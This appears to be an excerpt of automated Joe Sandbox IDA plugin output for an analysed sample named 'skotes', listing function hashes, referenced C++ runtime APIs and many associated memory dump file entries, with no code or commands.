                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::$Base::$Scheduler$ContextThrottling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_ExerciseFoundH_prolog3_catchNextProcessor::RingSchedulingSpinStartupTicket::TimerUntilWith
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1475861073-0
                                                                                                                                            • Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                            • Instruction ID: 4967c6086ddb989b4b6bce25c5a6b0db91a338dccad644af2602e4da857eca3b
                                                                                                                                            • Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
                                                                                                                                            • Instruction Fuzzy Hash: F6317C30B082D16FCF96AB7A48927FE77B59F41304F0405A9D495DB243EB244D0AC3D1
                                                                                                                                            APIs
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00AF4877
                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00AF487F
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00AF4908
                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00AF4933
                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00AF4988
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                            • String ID: csm
                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                            • Opcode ID: b4a01a8949adedd13442d6c159695bc345c38479f8f0054749a3c70a669740b6
                                                                                                                                            • Instruction ID: ddef5d1ba2b4eae0be0331d663ab86a89dbc5c4c7f3f5a80b6db381a99b518d8
                                                                                                                                            • Opcode Fuzzy Hash: b4a01a8949adedd13442d6c159695bc345c38479f8f0054749a3c70a669740b6
                                                                                                                                            • Instruction Fuzzy Hash: 9441B334E0020DABCF10DFA8D884AAFBFF5AF49354F148195FA189B392D7719A51CB91
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 00AEDD91
                                                                                                                                            • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 00AEDDAE
                                                                                                                                            • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 00AEDE14
                                                                                                                                            • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 00AEDE29
                                                                                                                                            • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 00AEDE3B
                                                                                                                                            • Concurrency::details::InternalContextBase::CleanupDispatchedContextOnCancel.LIBCMT ref: 00AEDE4B
                                                                                                                                            • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 00AEDE74
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::$Context$Base::Internal$ChoreWork$AssociatedCancelCleanupCompletionCreateCurrentDispatchedExecuteExecutedFoundInlineListThreadWait
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2885714658-0
                                                                                                                                            • Opcode ID: 430283c4ac76032f4580a0e2e6251b67476b39f6da259b599010dc0c6f196e4a
                                                                                                                                            • Instruction ID: 02847fe6f7508f93c9af0c101c263afa6cd7f3e39ea020c7ea956c23d0599af9
                                                                                                                                            • Opcode Fuzzy Hash: 430283c4ac76032f4580a0e2e6251b67476b39f6da259b599010dc0c6f196e4a
                                                                                                                                            • Instruction Fuzzy Hash: DC41CD30A042C48ADF15FFB68A997ED7BA56F10304F1440A9E8466F2C3CB758E04CB62
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00AEE7D7
                                                                                                                                              • Part of subcall function 00AEE544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00AEE577
                                                                                                                                              • Part of subcall function 00AEE544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00AEE599
                                                                                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00AEE854
                                                                                                                                            • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00AEE860
                                                                                                                                            • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00AEE86F
                                                                                                                                            • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00AEE879
                                                                                                                                            • Concurrency::location::_Assign.LIBCMT ref: 00AEE8AD
                                                                                                                                            • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00AEE8B5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1924466884-0
                                                                                                                                            • Opcode ID: 4facbdad208fea5b168ec1e67c44844674bfdcb3e67b9e8d15518865141c98ba
                                                                                                                                            • Instruction ID: 023cbef498ae9378120097a3d9942c68586dd3a85638507183efb36b070524d7
                                                                                                                                            • Opcode Fuzzy Hash: 4facbdad208fea5b168ec1e67c44844674bfdcb3e67b9e8d15518865141c98ba
                                                                                                                                            • Instruction Fuzzy Hash: 3F412975A00244DFCF05EF65C595AADB7B9FF48310F1480A9DD499B382DB70A941CB91
                                                                                                                                            APIs
                                                                                                                                            • __Mtx_unlock.LIBCPMT ref: 00AD6ED1
                                                                                                                                            • std::_Rethrow_future_exception.LIBCPMT ref: 00AD6F22
                                                                                                                                            • std::_Rethrow_future_exception.LIBCPMT ref: 00AD6F32
                                                                                                                                            • __Mtx_unlock.LIBCPMT ref: 00AD6FD5
                                                                                                                                            • __Mtx_unlock.LIBCPMT ref: 00AD70DB
                                                                                                                                            • __Mtx_unlock.LIBCPMT ref: 00AD7116
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
